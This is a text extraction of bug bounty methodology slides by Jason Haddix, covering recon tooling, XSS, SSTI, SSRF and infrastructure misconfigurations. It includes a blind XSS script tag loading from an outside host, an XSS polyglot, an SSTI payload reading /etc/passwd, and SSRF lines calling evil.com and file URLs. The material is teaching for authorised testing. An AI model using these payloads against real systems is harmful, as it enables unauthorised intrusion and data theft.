The Bug Hunters

Methodology v2
 whoami

★ Jason Haddix - @jhaddix

★ Head of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (Top 50 currently)
★ Father, hacker, blogger, gamer!
What this talk is about...

Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics

★ philosophy shifts
Aka “How to Shot Web” @ DEFCON23
★ discovery techniques ★ Subdomain & Discovery
★ mapping methodology ★ SQLi
★ parameters oft attacked ★ XSS
★ useful fuzz strings ★ File Uploads
★ bypass or filter evasion techniques ★ CSRF
★ new/awesome tooling ★ Privilege, Auth, IDOR
★ memes
v2

★ MOAR discovery
★ Infrastructure and config
★ xss
★ API Testing v2.5
★ ssti
★ Object Deserialization v2.5
★ ssrf
★ XXE v2.5
★ Code Inj / cmdi /
advancements in
fuzzing
light reading
Discovery ++
 Discovery

TBHMv1 ★ (sub Scraping)Sublist3r

❏ Intro to scraping for subdomains ○ brutesubs
❏ Enumall (recon-ng, Alt-DNS wrapper) ★ (sub bruting) MaSSDNS ++
❏ Nmap Standard ○ all.txt list
★ (port scanning) MASSCAN ++
○ Asn + nmap style
Sublist3r
 Sub Scraping

recon-ng/enumall Both sublist3r

ssltools.com API Google (Recon-ng now handles captcha) Baidu

HackerTarget.com API Bing Ask

Shodan Crt.sh DNSDumpster (scans.io)

ThreatCrowd Virustotal

Zoomeye (not core) Netcraft Ptrarchive.com

Threatcrowd regged by email (not core)

Zone transfer (not core)

RiskIQ API (not core)

Censys.io (not core)

★ Some configuration required
○ Update Docker IMage with non core
recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)

★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting

1,136,964 line subdomain dictionary (all.txt)

Tool Time to run Threads Found

subbrute errored 100 0

time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output

gobuster 21m15.857s 100 87

time gobuster -m dns -u $TARGET.com -t 100 -w all.txt

massdns 1m24.167 n/a 213

time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -

dns-parallel-prober 42m2.868s 100 43

time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt

blacksheepwall 256m9.385s 100 61

time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com
Sub Bruting

With Massdns, why not all of them?

all.txt

https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Acquisitions

★ Crunchbase

★ Protected by
distil bot
protection

★ Stay tuned
 Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found

masscan
masscan
You can use a conf file for this! 11m4.164s 196
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT

nmap zzz
∞
Visual Identification

★ Because of the nature of scraping and dns redirects

some sites will be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on
(http vs https, ++)
Platform Identification
and CVE searching
TBHMv1
PAUSE... NONE OF THIS REPLACES WALKING & UNDERSTANDING
THE APP
Content Discovery /
Directory Bruting
TBHMv1
❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 params
 Domain Domain
Identify IPs bruteforcing, Visual
scraping for Portscan
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges

ASNs enumall
Reverse Whois sublist3r Massdns masscan eyewitness
Acquisitions Brutesubs Manual
++ ++

Platform Content Parameter

Identification Discovery discovery

Builtwith
Wappalyzer Gobuster
Parameth
Vulners Burp Wordlists
Burp analyze target
Plugin Burp
++
XSS
XSS (not a lot)
TBHMv1
❏ polyglots
❏ Seclists (what up dan!)
❏ Flash
❏ Common input vectors
★ Blind XSS Frameworks
○ Sleepy Puppy (python)
○ XSS Hunter (python)
○ Ground control (Ruby)(small)
★ Polyglots
★ Xss mindmap
Blind XSS
G
BU

1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4

!
script shell !!#
Y.vg is a java

3
XSSHunter
Payload:

★ The vulnerable page's URI

★ Origin of Execution
★ The Victim's IP Address
★ The Page Referer
★ The Victim's User Agent
★ All Non-HTTP-Only Cookies
★ The Page's Full HTML DOM
★ Full Screenshot of the Affected
Page
★ Responsible HTTP Request (If an
XSS Hunter compatible tool is
used)
★ Nod to beef & XSShell
XSS Polyglot #4

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csV
g/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s
XSS
Mindmap
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing

Core Idea: Does the application utilize a template engine? ++

★ Engine identification
○ WAPPalyzer + BuiltWith + Vulners scanner
○ Test fuzzing
○ Tooling
○ TPLmap + tplmap Burp Extension
○ Backslash powered scanner?
★ Resources
SSTI

1: https://acme.com/errorpage{{2*3}}

2:

https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__
()[40]('/etc/passwd').read() }}
SSTI Tooling
SSTI Original Whitepaper - James
Kettle
http://blog.portswigger.net/2015/08/server-side-template-injection.html

Resources
OWASP SSTI Workshop - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-i
Gérôme Dieu njection-ssti

Exploring SSTI in https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/

Flask/Jinja2 - Tim Tomes
https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/

Injecting Flask - Ryan Reid https://nvisium.com/blog/2015/12/07/injecting-flask/

Hi Pete!
Rails Dynamic Render to https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-201
RCE (CVE-2016-0752) - 6-0752/
John Poulin

uber.com may RCE by Flask https://hackerone.com/reports/125980

Jinja2 Template Injection -
Orange Tsai
Server Side Request
Forgery
 SSRF Common Parameters or Injection
points from TBHMv1
TBHMv1 ★ Where? file= folder=
❏ Nothing ★ Resources
❏ Well kinda... SSRF ○ SSRF Bible (black magic)
location= style=

(visually) looks very ★ Exploit locale= template=

similar to LFI / RFI / ○ Burp Collaborator
Path/dir Traversal! ★ Honourable mention:
path= doc=

❏ REMIX! ○ display= source=

○ ^ “Blind detection of load= pdf=

path
traversal-vulnerable read= dest=

file uploads” retrieve= continue=

SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here

http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
SSRF Resources

★ protocol
and
schema
mappings

★ Exploit
examples
SSRF Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF

Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html

Exploiting Server Side Request Forgery on a https://sethsec.blogspot.com/2015/12/exploiting-server-side-requ

Node/Express Application (hosted on Amazon est-forgery.html
EC2) - Seth Art

Server-side browsing http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_co

considered harmful - Nicolas Grégoire nsidered_harmful.pdf

How To: Server-Side Request Forgery (SSRF) - https://www.hackerone.com/blog-How-To-Server-Side-Request-F

Jobert Abma orgery-SSRF

Escalating XSS in PhantomJS Image Rendering to http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-r

SSRF/Local-File Read - Brett Buerhaus endering-to-ssrflocal-file-read/

Burp, Collaborate, and Listen: A Pentester https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-

Reviews the Latest Burp Suite Addition - Max pentester-reviews-latest-burp-suite-addition/
Zinkus
Code Inj, CDMi, & Future
Fuzzing
Code Injection + CMD
Injection + New Fuzzing

TBHMv1
❏ Sqli ★ Commix
❏ Polyglot ○ CMDi
❏ Seclists ○ Supports php code inj
❏ Sqlmap ★ Unknown Identification
❏ Params ○ Backslash Powered Scanner
❏ Tooling ★ resources
❏ resources albinowax (James Kettle)
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-pow
ered-scanning-hunting.html
Infrastructure & Config
 Subdomain takeover!

★ Pretty simple, check for cnames that

resolve to these services, if the
service has lapsed, register and
profit!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
Bespoke .nfo
Bespoke .nfo
resources!
TBHMv1

https://www.slideshare.net/bugcrowd/how-do-i-shot-web-jason-haddix-at-defcon-23
https://www.youtube.com/watch?v=-FAjxUOKbdI

https://github.com/jhaddix/tbhm
Updates coming soon...
Jason Haddix - @jhaddix
[email protected]
Links
Peter Yaworski (Web Hacking 101 Book) https://leanpub.com/web-hacking-101

Andy Gill (Breaking into Infosec) https://leanpub.com/ltr101-breaking-into-infosec

Aboul3la (Sublist3r) https://github.com/aboul3la/Sublist3r

Prakhar Prasad (Mastering Modern Web https://www.packtpub.com/networking-and-servers/mastering-modern-web-penetration-testing

Penetration Testing)

Jhaddix (enunall) https://github.com/jhaddix/domain

Tim tomes (Recon-ng) https://bitbucket.org/LaNMaSteR53/recon-ng

@infosec_au & @nnwakelam (Alt-DNS) https://github.com/infosec-au/altdns

Blechschmidt (Massdns) https://github.com/blechschmidt/massdns

Robertdavidgraham (Masscan) https://github.com/robertdavidgraham/masscan

jhaddix - (all.txt domain word list) https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056

Anshumanbh (Brutesubs) https://github.com/anshumanbh/brutesubs

OJ Reeves (Gobuster) https://github.com/OJ/gobuster

Links
Epinna (Tplmap) https://github.com/epinna/tplmap

Mak0 (parameth) https://github.com/mak-/parameth

vulnersCom (burp-vulners-scanner) https://github.com/vulnersCom/burp-vulners-scanner

ChrisTruncer (Eyewitness) https://github.com/ChrisTruncer/EyeWitness

Jackmasa (XSS Mindmap) https://github.com/jackmasa/XSS.png

Anshumanbh (censys.py sub scraper) https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9

Scumsec (non-core recon-ng modules) https://github.com/scumsec/Recon-ng-modules

Vlad Styran (non-core recon-ng modules) https://bitbucket.org/LaNMaSteR53/recon-ng/pull-requests/260/add-passivetotal-subdomains-enumer

ator/diff#chg-modules/recon/domains-hosts/passivetotal_subdomains.py

Mandatoryprogrammer (Cloudflare_enum) https://github.com/mandatoryprogrammer/cloudflare_enum

Daniel Miessler (Robots Disallowed) https://github.com/danielmiessler/RobotsDisallowed

Links
Lorenzog (dns-parallel-prober) https://github.com/lorenzog/dns-parallel-prober

SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#

Ewilded (psychoPATH) https://github.com/ewilded/psychoPATH

Commix https://github.com/commixproject/commix

Albinowax (Top 2500 alexa parsed param names) https://github.com/PortSwigger/backslash-powered-scanner/blob/master/resources/params

Netflix (SleepyPuppy Blind XSS framework) https://github.com/Netflix/sleepy-puppy

Mandatoryprogrammer (xsshunter) https://github.com/mandatoryprogrammer/xsshunter

Jobertabma (ground-control) https://github.com/jobertabma/ground-control

0xSobky (XSS polyglot #4) https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

PortSwigger / Ablinawax (Backslash Powered https://github.com/PortSwigger/backslash-powered-scanner

Scanner)
Links
JordyZomer (autoSubTakeover) https://github.com/JordyZomer/autoSubTakeover

Nahamsec (HostileSubBruteforcer) https://github.com/nahamsec/HostileSubBruteforcer

Anshumanbh (tko-subs) https://github.com/anshumanbh/tko-subs

Frans Rosen (A deep dive into AWS S3 access controls https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-

– taking full control over your assets) over-your-assets/

yasinS (sandcastle) https://github.com/yasinS/sandcastle

Robin Wood (bucketfinder) https://digi.ninja/projects/bucket_finder.php

Michenriksen (gitrob) https://github.com/michenriksen/gitrob

Dxa4481 (truffleHog) https://github.com/dxa4481/truffleHog

Bug Bounty Forum https://bugbountyforum.com/

Cool Curation: https://github.com/qazbnm456/awesome-web-security

https://github.com/infoslack/awesome-web-hacking

https://github.com/djadmin/awesome-bug-bounty